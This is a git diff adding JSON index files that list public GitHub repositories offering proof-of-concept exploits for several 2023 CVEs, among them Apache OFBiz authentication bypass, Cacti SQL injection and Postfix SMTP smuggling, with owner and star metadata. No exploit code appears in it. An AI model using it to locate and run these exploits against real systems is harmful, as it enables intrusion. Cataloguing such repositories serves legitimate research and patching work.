"2024-01-09T15:44:52Z", + "updated_at": "2024-01-09T15:44:52Z", + "pushed_at": "2024-01-09T15:57:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745786201, + "name": "CVE-2023-51385", + "full_name": "farliy-hacker\/CVE-2023-51385", + "owner": { + "login": "farliy-hacker", + "id": 62786635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4", + "html_url": "https:\/\/github.com\/farliy-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385", + "description": "CVE-2023-51385", + "fork": false, + "created_at": "2024-01-20T06:09:45Z", + "updated_at": "2024-01-20T06:09:46Z", + "pushed_at": "2024-01-20T06:12:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 745788678, + "name": "CVE-2023-51385-save", + "full_name": "farliy-hacker\/CVE-2023-51385-save", + "owner": { + "login": "farliy-hacker", + "id": 62786635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/62786635?v=4", + "html_url": "https:\/\/github.com\/farliy-hacker", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/farliy-hacker\/CVE-2023-51385-save", + "description": "CVE-2023-51385-save", + "fork": false, + "created_at": "2024-01-20T06:20:37Z", + "updated_at": "2024-01-20T06:20:38Z", + "pushed_at": "2024-01-20T06:21:04Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 750239281, + "name": "CVE-2023-51385", + "full_name": "2048JiaLi\/CVE-2023-51385", + "owner": { + "login": "2048JiaLi", + "id": 38320564, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38320564?v=4", + "html_url": "https:\/\/github.com\/2048JiaLi", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2048JiaLi\/CVE-2023-51385", + "description": "CVE-2023-51385 的exp", + "fork": false, + "created_at": "2024-01-30T09:01:05Z", + "updated_at": "2024-01-30T09:02:38Z", + "pushed_at": "2024-01-30T09:02:50Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 787174802, + "name": "CVE-2023-51385-", + "full_name": "thinkliving2020\/CVE-2023-51385-", + "owner": { + "login": "thinkliving2020", + "id": 74002146, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/74002146?v=4", + "html_url": "https:\/\/github.com\/thinkliving2020", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/thinkliving2020\/CVE-2023-51385-", + "description": "CVE-2023-51385 ", + "fork": false, + "created_at": "2024-04-16T03:01:03Z", + "updated_at": "2024-04-16T03:01:04Z", + "pushed_at": "2024-04-16T03:06:54Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 806731455, + "name": "CVE-2023-51385", + "full_name": "c0deur\/CVE-2023-51385", + "owner": { + "login": "c0deur", + "id": 7541172, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7541172?v=4", + "html_url": "https:\/\/github.com\/c0deur", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/c0deur\/CVE-2023-51385", + "description": null, + "fork": false, + "created_at": "2024-05-27T19:29:55Z", + "updated_at": "2024-05-27T20:01:39Z", + "pushed_at": "2024-05-27T20:01:35Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 814326255, + "name": "CVE-2023-51385_poc", + "full_name": "endasugrue\/CVE-2023-51385_poc", + "owner": { + "login": "endasugrue", + "id": 26721171, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/26721171?v=4", + "html_url": "https:\/\/github.com\/endasugrue", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/endasugrue\/CVE-2023-51385_poc", + "description": null, + "fork": false, + "created_at": "2024-06-12T19:38:42Z", + "updated_at": "2024-06-12T20:34:48Z", + "pushed_at": "2024-06-12T20:34:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 815463201, + "name": "CVE-2023-51385-exploit", + "full_name": "MiningBot-eth\/CVE-2023-51385-exploit", + "owner": { + "login": "MiningBot-eth", + "id": 171243902, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171243902?v=4", + "html_url": "https:\/\/github.com\/MiningBot-eth", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MiningBot-eth\/CVE-2023-51385-exploit", + "description": null, + "fork": false, + "created_at": "2024-06-15T08:27:46Z", + "updated_at": "2024-06-15T08:27:49Z", + "pushed_at": "2024-06-15T08:28:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 844807994, + "name": "CVE-2023-51385_test", + "full_name": "Featherw1t\/CVE-2023-51385_test", + "owner": { + "login": "Featherw1t", + "id": 111293739, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/111293739?v=4", + "html_url": "https:\/\/github.com\/Featherw1t", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Featherw1t\/CVE-2023-51385_test", + "description": null, + "fork": false, + "created_at": "2024-08-20T02:25:58Z", + "updated_at": "2024-08-20T02:45:47Z", + "pushed_at": "2024-08-20T02:45:43Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51409.json b/2023/CVE-2023-51409.json new file mode 100644 index 0000000000..135decfb9b --- /dev/null +++ b/2023/CVE-2023-51409.json @@ -0,0 +1,33 @@ +[ + { + "id": 761865974, + "name": "CVE-2023-51409", + "full_name": "RandomRobbieBF\/CVE-2023-51409", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2023-51409", + "description": "AI Engine: ChatGPT Chatbot <= 1.9.98 - Unauthenticated Arbitrary File Upload via rest_upload", + "fork": false, + "created_at": "2024-02-22T16:26:57Z", + "updated_at": "2024-07-11T16:38:49Z", + "pushed_at": "2024-02-22T16:29:56Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5142.json b/2023/CVE-2023-5142.json new file mode 100644 index 0000000000..05762061f9 --- /dev/null +++ b/2023/CVE-2023-5142.json @@ -0,0 +1,33 @@ +[ + { + "id": 707145538, + "name": "CVE-H3C-Report", + "full_name": "kuangxiaotu\/CVE-H3C-Report", + "owner": { + "login": "kuangxiaotu", + "id": 99320591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99320591?v=4", + "html_url": "https:\/\/github.com\/kuangxiaotu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kuangxiaotu\/CVE-H3C-Report", + "description": "CVE-2023-5142", + "fork": false, + "created_at": "2023-10-19T10:09:47Z", + "updated_at": "2023-10-19T10:09:47Z", + "pushed_at": "2023-09-08T01:56:09Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51448.json b/2023/CVE-2023-51448.json new file mode 100644 index 0000000000..34086dd421 --- /dev/null +++ b/2023/CVE-2023-51448.json @@ -0,0 +1,33 @@ +[ + { + "id": 768047429, + "name": "CVE-2023-51448-cacti-sqli-poc", + "full_name": "jakabakos\/CVE-2023-51448-cacti-sqli-poc", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/CVE-2023-51448-cacti-sqli-poc", + "description": null, + "fork": false, + "created_at": "2024-03-06T11:23:11Z", + "updated_at": "2024-06-06T11:58:41Z", + "pushed_at": "2024-03-06T11:23:11Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51467.json b/2023/CVE-2023-51467.json new file mode 100644 index 0000000000..d8641860f1 --- /dev/null +++ b/2023/CVE-2023-51467.json @@ -0,0 +1,305 @@ +[ + { + "id": 736831199, + "name": "CVE-2023-51467", + "full_name": "JaneMandy\/CVE-2023-51467", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467", + "description": "CVE-2023-51467 POC", + "fork": false, + "created_at": "2023-12-29T02:25:43Z", + "updated_at": "2024-11-09T17:57:34Z", + "pushed_at": "2024-01-02T07:28:24Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737019244, + "name": "CVE-2023-51467", + "full_name": "Chocapikk\/CVE-2023-51467", + "owner": { + "login": "Chocapikk", + "id": 88535377, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88535377?v=4", + "html_url": "https:\/\/github.com\/Chocapikk", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Chocapikk\/CVE-2023-51467", + "description": "Apache OfBiz Auth Bypass Scanner for CVE-2023-51467", + "fork": false, + "created_at": "2023-12-29T15:01:46Z", + "updated_at": "2024-09-04T08:57:07Z", + "pushed_at": "2023-12-31T01:23:55Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "apache-ofbiz", + "auth-bypass", + "bugbounty", + "cve-2023-51467", + "cybersecurity", + "ethical-hacking", + "exploit", + "infosec", + "open-source-security", + "patch-management", + "penetration-testing", + "security-automation", + "security-tools", + "vulnerability-detection", + "vulnerability-scanner" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 737064466, + "name": "CVE-2023-51467-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2023-51467-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2023-51467-EXPLOIT", + "description": "A PoC exploit for CVE-2023-51467 - Apache OFBiz Authentication Bypass", + "fork": false, + "created_at": "2023-12-29T17:47:54Z", + "updated_at": "2024-09-25T10:52:29Z", + "pushed_at": "2023-12-31T21:29:59Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2023-51467", + "poc", + "ssrf" + ], + "visibility": "public", + "forks": 1, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738140662, + "name": "Apache-OFBiz-Authentication-Bypass", + "full_name": "jakabakos\/Apache-OFBiz-Authentication-Bypass", + "owner": { + "login": "jakabakos", + "id": 42498816, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42498816?v=4", + "html_url": "https:\/\/github.com\/jakabakos", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jakabakos\/Apache-OFBiz-Authentication-Bypass", + "description": "This repo is a PoC with to exploit CVE-2023-51467 and CVE-2023-49070 preauth RCE vulnerabilities found in Apache OFBiz.", + "fork": false, + "created_at": "2024-01-02T14:20:10Z", + "updated_at": "2024-09-25T10:55:06Z", + "pushed_at": "2024-03-24T18:20:52Z", + "stargazers_count": 73, + "watchers_count": 73, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 73, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 738955975, + "name": "Exploit_CVE-2023-51467", + "full_name": "Subha-BOO7\/Exploit_CVE-2023-51467", + "owner": { + "login": "Subha-BOO7", + "id": 141217634, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/141217634?v=4", + "html_url": "https:\/\/github.com\/Subha-BOO7", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Subha-BOO7\/Exploit_CVE-2023-51467", + "description": null, + "fork": false, + "created_at": "2024-01-04T12:44:43Z", + "updated_at": "2024-01-04T12:51:15Z", + "pushed_at": "2024-01-04T12:45:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 739631896, + "name": "CVE-2023-51467-Exploit", + "full_name": "JaneMandy\/CVE-2023-51467-Exploit", + "owner": { + "login": "JaneMandy", + "id": 36792635, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/36792635?v=4", + "html_url": "https:\/\/github.com\/JaneMandy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JaneMandy\/CVE-2023-51467-Exploit", + "description": "Apache Ofbiz CVE-2023-51467 图形化漏洞利用工具", + "fork": false, + "created_at": "2024-01-06T04:07:07Z", + "updated_at": "2024-09-05T01:30:59Z", + "pushed_at": "2024-01-06T10:33:34Z", + "stargazers_count": 39, + "watchers_count": 39, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 39, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 741082767, + "name": "cve-2023-51467", + "full_name": "vulncheck-oss\/cve-2023-51467", + "owner": { + "login": "vulncheck-oss", + "id": 134310220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/134310220?v=4", + "html_url": "https:\/\/github.com\/vulncheck-oss", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/vulncheck-oss\/cve-2023-51467", + "description": "A go-exploit for Apache OFBiz CVE-2023-51467", + "fork": false, + "created_at": "2024-01-09T16:58:06Z", + "updated_at": "2024-11-22T23:28:43Z", + "pushed_at": "2024-11-22T17:26:31Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2023-51467", + "go-expliot" + ], + "visibility": "public", + "forks": 1, + "watchers": 5, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 742705000, + "name": "BadBizness-CVE-2023-51467", + "full_name": "2ptr\/BadBizness-CVE-2023-51467", + "owner": { + "login": "2ptr", + "id": 39099220, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39099220?v=4", + "html_url": "https:\/\/github.com\/2ptr", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/2ptr\/BadBizness-CVE-2023-51467", + "description": "Auto exploit script for the Java web framework OF Biz under CVE-2023-51467. ", + "fork": false, + "created_at": "2024-01-13T05:40:38Z", + "updated_at": "2024-01-14T14:17:16Z", + "pushed_at": "2024-01-13T06:43:24Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 856884125, + "name": "Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "full_name": "AhmedMansour93\/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "owner": { + "login": "AhmedMansour93", + "id": 179945455, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179945455?v=4", + "html_url": "https:\/\/github.com\/AhmedMansour93", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/AhmedMansour93\/Event-ID-217-Rule-Name-SOC254-Apache-OFBiz-Auth-Bypass-and-Code-Injection-0Day-CVE-2023-51467-", + "description": "🚨 Just completed an incident report on Event ID 217: Apache OFBiz Auth Bypass and Code Injection 0-Day (CVE-2023-51467). This critical vulnerability allows attackers to bypass authentication and execute code remotely! Stay vigilant and ensure your systems are patched! Big thanks to LetsDefend.io for the platform to practice real-world scenarios.", + "fork": false, + "created_at": "2024-09-13T11:47:07Z", + "updated_at": "2024-09-13T11:48:06Z", + "pushed_at": "2024-09-13T11:48:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51504.json b/2023/CVE-2023-51504.json new file mode 100644 index 0000000000..ab47560cc4 --- /dev/null +++ b/2023/CVE-2023-51504.json @@ -0,0 +1,33 @@ +[ + { + "id": 650964426, + "name": "CVE-2023-51504", + "full_name": "Sybelle03\/CVE-2023-51504", + "owner": { + "login": "Sybelle03", + "id": 107751839, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107751839?v=4", + "html_url": "https:\/\/github.com\/Sybelle03", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Sybelle03\/CVE-2023-51504", + "description": "This is a dockerized reproduction of the MotoCMS SQL injection (cf exploit db) ", + "fork": false, + "created_at": "2023-06-08T07:37:08Z", + "updated_at": "2023-06-08T08:01:23Z", + "pushed_at": "2023-06-08T08:45:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51518.json b/2023/CVE-2023-51518.json new file mode 100644 index 0000000000..95823d7cd6 --- /dev/null +++ b/2023/CVE-2023-51518.json @@ -0,0 +1,41 @@ +[ + { + "id": 809967783, + "name": "CVE-2023-51518", + "full_name": "mbadanoiu\/CVE-2023-51518", + "owner": { + "login": "mbadanoiu", + "id": 18383407, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2023-51518", + "description": "CVE-2023-51518: Preauthenticated Java Deserialization via JMX in Apache James", + "fork": false, + "created_at": "2024-06-03T19:48:53Z", + "updated_at": "2024-06-03T20:13:29Z", + "pushed_at": "2024-06-03T20:09:42Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "0-day", + "cve", + "cve-2023-51518", + "cves", + "deserialization", + "local-privilege-escalation", + "pre-authentication" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51764.json b/2023/CVE-2023-51764.json new file mode 100644 index 0000000000..911079b831 --- /dev/null +++ b/2023/CVE-2023-51764.json @@ -0,0 +1,128 @@ +[ + { + "id": 735990437, + "name": "CVE-2023-51764", + "full_name": "duy-31\/CVE-2023-51764", + "owner": { + "login": "duy-31", + "id": 20819326, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20819326?v=4", + "html_url": "https:\/\/github.com\/duy-31", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/duy-31\/CVE-2023-51764", + "description": "Postfix SMTP Smuggling - Expect Script POC", + "fork": false, + "created_at": "2023-12-26T17:02:20Z", + "updated_at": "2024-10-17T03:35:05Z", + "pushed_at": "2023-12-26T20:16:45Z", + "stargazers_count": 26, + "watchers_count": 26, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 26, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 736523793, + "name": "CVE-2023-51764", + "full_name": "eeenvik1\/CVE-2023-51764", + "owner": { + "login": "eeenvik1", + "id": 49790977, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49790977?v=4", + "html_url": "https:\/\/github.com\/eeenvik1", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/eeenvik1\/CVE-2023-51764", + "description": "PoC CVE-2023-51764 ", + "fork": false, + "created_at": "2023-12-28T06:20:13Z", + "updated_at": "2024-09-30T08:27:01Z", + "pushed_at": "2023-12-28T06:33:39Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve" + ], + "visibility": "public", + "forks": 4, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 737562870, + "name": "CVE-2023-51764-POC", + "full_name": "d4op\/CVE-2023-51764-POC", + "owner": { + "login": "d4op", + "id": 11721930, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11721930?v=4", + "html_url": "https:\/\/github.com\/d4op", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/d4op\/CVE-2023-51764-POC", + "description": "just idea, no cp pls", + "fork": false, + "created_at": "2023-12-31T14:33:26Z", + "updated_at": "2024-01-25T21:28:13Z", + "pushed_at": "2024-01-03T21:47:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 739273926, + "name": "CVE-2023-51764", + "full_name": "Double-q1015\/CVE-2023-51764", + "owner": { + "login": "Double-q1015", + "id": 77765134, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77765134?v=4", + "html_url": "https:\/\/github.com\/Double-q1015", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Double-q1015\/CVE-2023-51764", + "description": "CVE-2023-51764 poc", + "fork": false, + "created_at": "2024-01-05T07:07:47Z", + "updated_at": "2024-01-05T07:12:42Z", + "pushed_at": "2024-01-05T07:12:16Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-5178.json b/2023/CVE-2023-5178.json new file mode 100644 index 0000000000..ce2c08e595 --- /dev/null +++ b/2023/CVE-2023-5178.json @@ -0,0 +1,33 @@ +[ + { + "id": 753172434, + "name": "CVE-2023-5178", + "full_name": "rockrid3r\/CVE-2023-5178", + "owner": { + "login": "rockrid3r", + "id": 112623010, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/112623010?v=4", + "html_url": "https:\/\/github.com\/rockrid3r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/rockrid3r\/CVE-2023-5178", + "description": "Exploit for CVE-2023-5178", + "fork": false, + "created_at": "2024-02-05T15:58:24Z", + "updated_at": "2024-05-24T10:17:06Z", + "pushed_at": "2024-05-17T18:39:43Z", + "stargazers_count": 6, + "watchers_count": 6, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 6, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51800.json b/2023/CVE-2023-51800.json new file mode 100644 index 0000000000..adee7f2b05 --- /dev/null +++ b/2023/CVE-2023-51800.json @@ -0,0 +1,33 @@ +[ + { + "id": 742038737, + "name": "CVE-2023-51800", + "full_name": "geraldoalcantara\/CVE-2023-51800", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51800", + "description": "Multiple cross-site scripting (XSS) vulnerabilities in School Fees Management System v1.0.", + "fork": false, + "created_at": "2024-01-11T16:28:04Z", + "updated_at": "2024-02-16T12:23:21Z", + "pushed_at": "2024-03-01T11:58:51Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51801.json b/2023/CVE-2023-51801.json new file mode 100644 index 0000000000..2fe16a68e5 --- /dev/null +++ b/2023/CVE-2023-51801.json @@ -0,0 +1,33 @@ +[ + { + "id": 742057874, + "name": "CVE-2023-51801", + "full_name": "geraldoalcantara\/CVE-2023-51801", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51801", + "description": "Simple Student Attendance System v.1.0 - Multiple SQL injection vulnerabilities - student_form.php and class_form.php", + "fork": false, + "created_at": "2024-01-11T17:14:33Z", + "updated_at": "2024-03-01T12:02:08Z", + "pushed_at": "2024-03-01T11:59:35Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2023/CVE-2023-51802.json b/2023/CVE-2023-51802.json new file mode 100644 index 0000000000..33f093cf5a --- /dev/null +++ b/2023/CVE-2023-51802.json @@ -0,0 +1,33 @@ +[ + { + "id": 742063325, + "name": "CVE-2023-51802", + "full_name": "geraldoalcantara\/CVE-2023-51802", + "owner": { + "login": "geraldoalcantara", + "id": 152064551, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/152064551?v=4", + "html_url": "https:\/\/github.com\/geraldoalcantara", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/geraldoalcantara\/CVE-2023-51802", + "description": "Simple Student Attendance System v.1.0 - Cross-site scripting (XSS) vulnerabilities in attendance_report", + "fork": false, + "created_at": "2024-01-11T17:28:16Z", + "updated_at": "2024-02-16T12:23:23Z", + "pushed_at": "2024-03-01T12:00:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline 